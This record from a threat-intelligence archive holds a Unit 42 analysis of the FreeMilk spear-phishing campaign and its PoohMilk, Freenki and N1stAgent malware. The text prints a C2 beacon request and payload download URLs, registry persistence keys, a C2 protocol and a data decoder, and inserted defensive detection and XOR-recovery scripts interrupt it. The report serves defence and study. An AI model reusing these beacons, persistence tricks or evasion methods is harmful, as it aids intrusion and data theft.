{
	"id": "61520a93-fc63-4385-a813-c5b0822bcc85",
	"created_at": "2026-04-06T00:15:57.098936Z",
	"updated_at": "2026-04-10T13:13:02.569442Z",
	"deleted_at": null,
	"sha1_hash": "eb4878cef3289b8ac77d12c58851e4369f4848c7",
	"title": "FreeMilk: A Highly Targeted Spear Phishing Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1126764,
	"plain_text": "FreeMilk: A Highly Targeted Spear Phishing Campaign\r\nBy Juan Cortes, Esmid Idrizovic\r\nPublished: 2017-10-05 · Archived: 2026-04-05 19:10:10 UTC\r\nIn May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across the world. The threat actor leveraged CVE-2017-0199, the Microsoft Word Office/WordPad Remote Code Execution Vulnerability, with carefully crafted decoy content customized for each target recipient. Our research showed that the spear phishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia. We believe that the threat actor hijacked an existing, legitimate in-progress conversation and posed as the legitimate senders to send malicious spear phishing emails to the recipients, as shown below in Figure 1.\r\nFigure 1. Conversation Hijacking to Deliver Malware\r\nUpon successful exploitation, the malicious document delivered two malware payloads, PoohMilk and Freenki.\r\nThe targeted victims we identified in this campaign include:\r\na bank based in the Middle East\r\ntrademark and intellectual property service companies based in Europe\r\nan international sporting organisation\r\nindividuals with indirect ties to a country in North East Asia\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 1 of 7\r\nIn past activity that we believe is linked to this same threat actor, dissidents and others were also likely targeted. We named this campaign “FreeMilk” after the words found in the malware’s PDB path strings.\r\nMalicious Document\r\nThe threat actor leveraged the Microsoft Word CVE-2017-0199 vulnerability, which is at present widely used in both targeted and non-targeted attacks. 
The malicious document sends the following beacon to a compromised web server, as shown in Figure 2.\r\nGET /btob_asiana/udel_calcel.php?fdid=Skg/W1MkR2ZVOT5mVDg3JkpIO2RLRjNrSkgmIUpJO11TOGlhPV4/Z1NCLi4= HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)\r\nHost: old.jrchina[.]com\r\nConnection: Keep-Alive\r\nFigure 2. Malicious Word document callback beacon\r\nThe C2 server responds with a Base64 encoded PowerShell script, which in turn downloads two fake image files that contain embedded PE binaries and a JavaScript file which extracts the embedded PE binaries onto the victim host, as shown in Figure 3. The extracted PE payloads are what we label PoohMilk and Freenki.\r\nOriginal File SHA256 (Original File Name) | Download URL | Extracted Payload SHA256 (Saved File Name)\r\n1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c (udel_ok.ipp) | http://old.jrchina[.]com/btob_asiana/udel_ok.ipp | -\r\n64ef80e7639c8c5dddf239883617e6740c6b3589f995d11314d36ab64fcfc54c (appach01.jpg) | http://old.jrchina[.]com/btob_asiana/appach01.jpg | 7f35521cdbaa4e86… (Windows-KB275…)\r\n40572e1fc37f4376fdb2a33a6c376631ff7bc00b1e64538a0385bc1e09a85574 (appach02.jpg) | http://old.jrchina[.]com/btob_asiana/appach02.jpg | 35273d6c25665a1… (Windows-KB271…)\r\nFigure 3. Downloaded files and extracted payloads (the hashes and saved file names in the last column are truncated in the source)\r\nPoohMilk Loader Analysis\r\nOur analysis shows that PoohMilk is the first stage loader. After successful exploitation, it sets persistence in the registry with the command line argument required to execute the second stage payload, in this case Freenki. The registry key-value pair in Figure 4 is used.\r\nFigure 4. 
Registry key value set for the second stage payload by PoohMilk\r\nIn addition to setting up the next stage, PoohMilk attempts to read and parse a file named \"wsatra.tmp\" in the user’s temp folder. If found, it reads the file’s contents expecting a path, which is then searched for any file with an LNK extension; the same path is then searched for files with a ZIP extension. The exact reason why it looks for *.lnk files is unclear. However, if it finds a *.zip file, it extracts its contents and copies the data to a file under the user’s temp folder, using the following filename format:\r\n\"%s\\\\Rar0tmpExtra%d.rtf\"\r\nwhere the '%d' is taken from the return value of a call to the Windows API GetTickCount(). It then executes this file with the Windows API ShellExecuteW().\r\nThe PDB paths in Figure 5 were found in PoohMilk loader samples.\r\nE:\\BIG_POOH\\Project\\milk\\Release\\milk.pdb\r\nE:\\BIG_POOH\\Project\\Desktop\\milk\\Release\\milk.pdb\r\nFigure 5. PDB paths found in PoohMilk samples\r\nWe observed that the threat actor consistently delivers different payload malware together with the PoohMilk loader. We assume this is an attempt to lower the chance of the payload malware being exposed to the security research community: without the proper command line argument, the payload hides its malicious behaviour when analysed by automated analysis systems.\r\nFreenki Downloader Analysis\r\nFreenki has two main purposes. The first is to collect host information and the other is to serve as a second stage downloader. Each of these is explained in detail in the following section.\r\nFreenki depends on the right command line argument being passed to execute any of its interesting code; if no arguments are passed it simply exits.\r\n
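The artifacts described so far (the Word document’s callback in Figure 2, the wsatra.tmp and Rar0tmpExtra%d.rtf files PoohMilk handles in the user’s temp folder, and a Run key that starts the second stage with a command line argument) translate directly into host-side hunting logic. The Python below is an added example written for this page, not code from Unit 42 or from the malware: it runs three rules over constructed Sysmon-style events (event IDs 3, 11 and 13 with simplified field names, not a real telemetry schema). The rule that flags a Run value ending in ‘ help’ assumes the loader’s persistence entry looks like Freenki’s own ‘runsample’ value described in the next section; every path, SID and hostname in the sample events is made up.

```python
import re

# Constructed Sysmon-style events for this example (IDs 3=network connect,
# 11=file create, 13=registry value set). Paths use '/' here for brevity;
# norm() also folds the backslashes real Windows telemetry contains.
SAMPLE_EVENTS = [
    {'id': 3, 'image': 'C:/Program Files/Microsoft Office/Office14/WINWORD.EXE',
     'dest_host': 'old.jrchina.com', 'dest_port': 80},
    {'id': 11, 'image': 'C:/Users/alice/AppData/Local/Temp/Windows-KB275.exe',
     'target': 'C:/Users/alice/AppData/Local/Temp/Rar0tmpExtra1983476.rtf'},
    {'id': 11, 'image': 'C:/Users/alice/AppData/Local/Temp/Windows-KB275.exe',
     'target': 'C:/Users/alice/AppData/Local/Temp/wsatra.tmp'},
    {'id': 13, 'image': 'C:/Users/alice/AppData/Local/Temp/Windows-KB271.exe',
     'target': 'HKU/S-1-5-21-1/Software/Microsoft/Windows/CurrentVersion/Run/runsample',
     'details': 'C:/Users/alice/AppData/Local/Temp/Windows-KB271.exe help'},
    {'id': 13, 'image': 'C:/Windows/explorer.exe',
     'target': 'HKU/S-1-5-21-1/Software/Microsoft/Windows/CurrentVersion/Run/OneDrive',
     'details': 'C:/Users/alice/AppData/Local/Microsoft/OneDrive/OneDrive.exe /background'},
    {'id': 3, 'image': 'C:/Program Files/Mozilla Firefox/firefox.exe',
     'dest_host': 'example.org', 'dest_port': 443},
]

OFFICE_IMAGES = {'winword.exe', 'wordpad.exe'}   # processes CVE-2017-0199 runs in
IOC_HOSTS = {'old.jrchina.com'}                   # callback host from Figure 2
# wsatra.tmp or Rar0tmpExtra<GetTickCount>.rtf as the last path component
TEMP_ARTIFACT = re.compile(r'/(rar0tmpextra[0-9]+[.]rtf|wsatra[.]tmp)$')

def norm(path):
    # lowercase and fold backslashes (chr(92)) to '/' so one pattern covers both
    return path.replace(chr(92), '/').lower()

def basename(path):
    return norm(path).rsplit('/', 1)[-1]

def evaluate(event):
    '''Return the names of the rules that fire for one event (empty list if none).'''
    hits = []
    eid = event['id']
    if eid == 3:
        if basename(event.get('image', '')) in OFFICE_IMAGES:
            hits.append('office_process_network')   # Word itself fetching remote content
        if event.get('dest_host', '').lower() in IOC_HOSTS:
            hits.append('known_c2_host')
    elif eid == 11:
        target = norm(event.get('target', ''))
        if '/temp/' in target and TEMP_ARTIFACT.search(target):
            hits.append('poohmilk_temp_artifact')
    elif eid == 13:
        target = norm(event.get('target', ''))
        details = event.get('details', '').lower()
        # heuristic: Run value whose command line ends in the argument the payload gates on
        if '/currentversion/run/' in target and details.endswith(' help'):
            hits.append('run_key_argument_gated')
    return hits

def scan(events):
    '''Map event index to its rule hits, keeping only events that fired.'''
    return {i: evaluate(e) for i, e in enumerate(events) if evaluate(e)}

if __name__ == '__main__':
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]['image'], ', '.join(hits))
```

The two benign events (the OneDrive Run value and the browser connection) are there to show the rules do not fire on ordinary activity; in production the ‘ help’ suffix check should be paired with the image path being under a user-writable directory, as it is in the sample, to keep false positives down.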
Freenki accepts three arguments, which are described below:\r\nconsole: Sets up persistence in the registry using the current path the sample is being executed from and appending the parameter ‘help’:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nkey name: runsample\r\nkey value: “[CURRENT_EXECUTION_PATH] help”\r\nhelp: Allows the malware to execute its main function, which beacons to its C2. Further details in the next section.\r\nsample: Allows the malware to set up persistence and communicate with its C2; equivalent to calling the malware with the argument console followed by help.\r\nThe first thing Freenki does is collect the host’s MAC address. This is converted to a hex string and appended to each request to its C2. This value is likely used as an ID to identify the victim to the attacker. Note that each request also carries a one-byte identifier, followed by the MAC address. The following IDs are used; all requests are made with the HTTP POST method, and between beacons the malware sleeps for 25 seconds.\r\n0x30 = Initial communication made to the C2. The malware loops over sending this initial request until the C2 responds with an HTTP OK (200) status and additional data.\r\n0x31 = This identifier is used to send host information. Below are the details collected:\r\nUsername\r\nComputerName\r\nFile version of kernel32.dll\r\nWhether the host is 64-bit, determined from the return value of the Windows API function IsWow64Process() (true when the 32-bit sample runs under WOW64)\r\nAll Ethernet MAC addresses\r\nA WMI query for ComputerName, Model and Manufacturer\r\nAll running processes\r\nFigure 6 shows what the data looks like before encoding; more on this later.\r\nFigure 6. Host information collected by Freenki (before encoding)\r\n0x34 = This identifier is used when the malware attempts to take a screenshot of the victim computer. The malware only collects a total of three screenshots before moving on.\r\n0x32 = This identifier is used to retrieve a secondary C2 server. The data is received encoded and then parsed to get the new C2 address. More on this in the secondary payload delivery section.\r\n0x33 = The malware sends this identifier prior to parsing the decoded secondary C2.\r\n0x35 = This identifier is used after it executes the secondary payload. The malware sends back the secondary C2 used to download the payload.\r\nThe malware uses the same algorithm to decode and encode most of its data. The initial C2 and hard coded User-Agent string are encoded and can be decoded using the code snippet in Figure 7. It is not a new method, but it is worth noting that Freenki uses SSE instructions to decode its data.\r\nimport sys\r\n\r\ndef decode_data():\r\n    # Freenki encoding, per byte: subtract 0xF, then XOR with 0x21 (masked to one byte)\r\n    with open(sys.argv[1], 'rb') as infile:\r\n        buf = bytearray(infile.read())\r\n    output = bytearray([((x - 0xF) ^ 0x21) \u0026 0xFF for x in buf])\r\n    # write the raw bytes; str(bytearray) would write the repr on Python 3\r\n    with open(\"decodedData.txt\", 'wb') as outfile:\r\n        outfile.write(bytes(output))\r\n\r\nif __name__ == \"__main__\":\r\n    decode_data()\r\nFigure 7. Python script to decode Freenki’s encoded data\r\nWe mentioned that one of the identifiers the malware uses gives it the capability to retrieve a secondary C2 address. A noteworthy detail is that the author uses the Windows API InternetOpenUrl(), so the secondary C2 address is a full URL with an HTTP, HTTPS or FTP scheme. Using the secondary C2 address the malware attempts to download another payload. This payload is expected to be larger than 100 bytes and to begin with the ASCII values ‘PNGF’. The secondary payload has two encoding layers: one is used solely in this part of the code, and the second is the same encoding discussed previously, which is used throughout the malware’s code. Once decoded, the malware writes the secondary payload to the user’s %temp% folder with a pseudo-random name. Then, using the Windows API ShellExecuteW() and the hard-coded argument ‘abai’, the malware executes the decoded payload (Figure 8).\r\nFigure 8. Secondary payload is executed with argument ‘abai’\r\nLinks to Previous Campaigns\r\nPhishing campaign disguised as Hancom update\r\nOn multiple occasions, we observed the PoohMilk loader discussed in this blog being used to load another remote administration tool we call N1stAgent (Figure 9; detailed analysis available in Appendix B).\r\nSHA256 | Compile Date | Original File Name | Malware Family\r\n1163da8c37ad9ba98d59b921ba8cf8e54bfc1282712cf754f4ff82b63f8e6027 | 2017-06-01 05:10:53 | Windows-KB276133-x86.exe | N1stAgent RAT\r\nba5905c2fe46bd6734973139e759ba405fd193c2342dfcac396e9d529b57821b | 2017-06-01 05:17:06 | Windows-KB251952-x86.exe | PoohMilk Loader\r\nFigure 9. N1stAgent and PoohMilk loader set\r\nN1stAgent is not widely used and appears to be used solely in targeted attacks. It first appeared in a phishing campaign in January 2016, in which it was delivered via phishing emails disguised as Hancom’s security patch.\r\nWatering hole on anti-government media website\r\nIn August 2016, visitors to an anti-government media website operated by defectors in the United Kingdom were targeted by a watering hole attack using a CVE-2016-0189 Microsoft Internet Explorer exploit. The exploit code attempted to deliver Freenki (Figure 10) as the payload malware.\r\nSHA256 | Download URL\r\n99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5 | http://www.ethanpublishing[.]com/ethanpublishing/phpcms/templates/de\r\nFigure 10. Freenki downloaded from the watering hole incident (download URL truncated in the source)\r\nConclusion\r\nThe FreeMilk spear phishing campaign is still ongoing. It has a small number of targets, but they are spread across different regions and sectors. The threat actor tried to stay under the radar by building malware that only executes when the proper argument is given, by hijacking an existing email conversation, and by carefully crafting each decoy document based on the hijacked conversation to make it look more legitimate. We were not able to identify the second stage malware delivered via the Freenki downloader during the campaign. We did notice some C2 infrastructure overlap with other cases previously mentioned by TALOS and a private researcher. 
However, we cannot draw firm conclusions from these overlaps, as the C2 domains were compromised websites and there were several months between the incidents.\r\nAutoFocus customers can identify these and other related samples using the BigPooh, Freenki, PoohMilk and N1stAgent tags.\r\nWildFire and Traps properly classify the samples described in this report as malicious.\r\nAppendix A: Indicators of Compromise\r\na50543919c52ccaea40155ce35aa791bc86bd634240fb51922827223aca5c88a\r\n201b876bcb97f6c8972cc677bdf1e3e2b2f069ae2ec4653db8af4797884efa30\r\n35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2\r\nba5905c2fe46bd6734973139e759ba405fd193c2342dfcac396e9d529b57821b\r\n0f82ea2f92c7e906ee9ffbbd8212be6a8545b9bb0200eda09cce0ba9d7cb1313\r\n34478d6692f8c28332751b31fd695b799d4ab36a8c12f7b728e2cb99ae2efcd9\r\n7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df\r\n99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5\r\n1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c\r\n1163da8c37ad9ba98d59b921ba8cf8e54bfc1282712cf754f4ff82b63f8e6027\r\nef40f7ddff404d1193e025081780e32f88883fa4dd496f4189084d772a435cb2\r\nold.jrchina[.]com\r\nfoodforu.heliohost[.]org\r\nwww.ethanpublishing[.]com\r\ndiscgolfglow[.]com\r\nAppendix B: N1stAgent Analysis\r\nSample properties:\r\nSHA256: 1163da8c37ad9ba98d59b921ba8cf8e54bfc1282712cf754f4ff82b63f8e6027\r\nFile Name: Windows-KB276133-x86.exe\r\nFile Size: 302,080\r\nTimestamp: 2017-06-01 05:10:53\r\nImport Hash: 3d3f31627c09d1e68647b2a66491efb3\r\nPDB Path: F:\\Backup\\2nd\\Agent\\Release\\Agent.pdb\r\nN1stAgent requires specific arguments to execute successfully. 
Some samples check only for one argument and others check for three different arguments, where each one either executes the malware, sets a startup key and runs the malware, or installs the malware as a service. Service installation was not working in the samples we found because the author seems to have forgotten to install the service with arguments. Here is an example of a sample which supports three arguments:\r\nArgument | Description\r\nhelp | Run the malware\r\n333 | Add a startup method and run the malware\r\n    Key: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\n    Name: Defender Update\r\n    Path: \u003ccurrent filename\u003e help\r\nusage | Installs itself as a service\r\n    - Display name: Windows Normai TCP?IP ICMP Service\r\n    - Service Name: icmphosts\r\n    - Description: Provides support for the ICMP over TCP/IP service and ARP name resolution for clients on the network, therefore enabling users to Network, print, and log on to the network. If this service is stopped, these functions might be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.\r\nFigure B-1. N1stAgent supported arguments\r\nConnection to C2\r\nThe agent will try to read its configuration from a file in %APPDATA% with the file extension “.DAT”. The file is encoded with a simple one-byte XOR and is decoded when read. If these files do not exist on the system it skips them and continues to connect to a configured IP address, which is a web server. It will try to connect to the web server three times, and each time it sends a GET request to download a file from the server which contains an additional IP address.\r\n
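A one-byte XOR over the .DAT configuration files is weak enough that the key does not need to be known: trying all 256 keys and scoring each candidate for printable text and a dotted-quad IP address recovers it. The Python below is an added example for this page, not N1stAgent code or Unit 42 tooling. It assumes the three configuration values (server IP address, hostname and file name for the GET request) are stored one per line, which the article does not state; the sample .DAT contents, the key 0x5A, the documentation-range IP 192.0.2.10 and the hostname are constructed for the example.

```python
import re

IP_RE = re.compile(r'[0-9]{1,3}([.][0-9]{1,3}){3}')
NL = chr(10)   # assumed field separator (newline); the real layout is not given

def xor1(data, key):
    '''XOR every byte with one key byte; applying it twice restores the input.'''
    return bytes(b ^ key for b in data)

def score(plain):
    '''Printable-ASCII ratio, plus a bonus when a dotted-quad IP address appears.'''
    printable = sum(1 for b in plain if 32 <= b < 127 or b in (9, 10, 13))
    s = printable / max(len(plain), 1)
    if IP_RE.search(plain.decode('ascii', 'replace')):
        s += 1.0
    return s

def recover_config(blob):
    '''Brute-force the single-byte key; return (key, fields) for the best candidate.'''
    best = max(range(256), key=lambda k: score(xor1(blob, k)))
    plain = xor1(blob, best).decode('ascii', 'replace')
    return best, plain.split(NL)

# Constructed sample: server IP (RFC 5737 documentation range), hostname and GET
# file name, XORed with key 0x5A. Not a real N1stAgent configuration.
SAMPLE_KEY = 0x5A
SAMPLE_PLAIN = NL.join(['192.0.2.10', 'update.example.net', '/news/list.txt']).encode('ascii')
SAMPLE_DAT = xor1(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == '__main__':
    key, fields = recover_config(SAMPLE_DAT)
    print('key=0x%02x server=%s host=%s file=%s' % (key, fields[0], fields[1], fields[2]))
```

The IP-address bonus is what makes the ranking decisive: a wrong key can leave most bytes printable, but it cannot keep the dots and digits of a dotted quad intact, so only the true key reaches the top score. The same routine serves for the second, hard-coded IP address the binary falls back to, once that blob has been carved from the sample.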
The configuration which defines the web server information is encrypted with XOR and contains these three values:\r\nServer IP address\r\nHostname\r\nFile name for the GET request\r\nFigure B-2. N1stAgent C2 connection\r\nIf the connection does not work or the server is down, it will try to connect to another predefined IP address, which is also stored encrypted in the binary. It connects to the server, sends its network adapter address and waits for commands from the server.\r\nIf the server responds with the command ID 19899003, the response contains a new IP address the agent should connect to, and the agent then finally reveals its backdoor functionality.\r\nThe backdoor supports three functions. The first is a remote shell (command “sm”) which emulates cmd.exe on the remote host. This feature is interesting because the code is copied from the Wine command program source code.\r\nFigure B-3. “Wine Cmd” in N1stAgent\r\nThe second is a file manager (command “fm”) which supports basic file operations: list, move, delete, set date/time, upload and download files.\r\nThe third (command “gm”) lets the remote attacker change the configuration. For example, the operator can create the configuration files in the %APPDATA% directory which contain additional IP addresses the malware should connect to in future.\r\nSource: https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
	],
	"report_names": [
		"unit42-freemilk-highly-targeted-spear-phishing-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434557,
	"ts_updated_at": 1775826782,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/eb4878cef3289b8ac77d12c58851e4369f4848c7.pdf",
		"text": "https://archive.orkl.eu/eb4878cef3289b8ac77d12c58851e4369f4848c7.txt",
		"img": "https://archive.orkl.eu/eb4878cef3289b8ac77d12c58851e4369f4848c7.jpg"
	}
}